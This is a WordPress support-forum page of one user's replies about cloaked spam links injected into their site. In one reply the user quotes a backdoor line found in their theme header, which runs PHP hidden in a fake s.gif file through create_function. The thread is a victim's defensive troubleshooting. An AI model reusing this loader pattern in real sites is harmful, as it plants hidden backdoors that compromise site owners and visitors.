omatan
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Stealth Link InjectionI don’t understand. How do you get from the masked code http://pastebin.com/Gztx7pSg to “real code” : http://pastebin.com/GdYfk4XJ
Forum: Fixing WordPress
In reply to: Stealth Link InjectionThanks. sneaky devils. that’t confirms what I suspected that IP addresses were checked. exactly to fool you if you used an agent switcher.
what tool do you use to deocde the php source ?
Forum: Fixing WordPress
In reply to: Stealth Link Injection@adpawl – here it is : http://pastebin.com/Gztx7pSg
Forum: Fixing WordPress
In reply to: Stealth Link Injection@zooini – this isn’t the pharma hack
adpawl – the problem is i wanted to recreate it in my broswer off the code – so I can trace how it occurs by turning things off
Seeing it in the google cache is useful to see where it occurs but doesn’t help me pinpoint which plugin or template or core area is affected. I did however look in the header of my theme and found what is likely the problem:<?php $wp__theme_icon=@create_function('',@file_get_contents('...../s.gif'));$wp__theme_icon(); ?>The s.gif file was some masked php code. I can’t test if that total solved it, but will wait till there is a new google cache.
Thanks.
Forum: Fixing WordPress
In reply to: Stealth Link Injection@adpawl – i’ve seen these posts – I am looking for leads to identify this particular problem. Clearly I can try rebuilding, but that would be my last resort.
@esmi – thanks for the reference to unmaskparasites.com – didn’t know of that resource.
My main concern is being able to replicate the links on my browser – if I could do that I am certain I could identify where the breach is.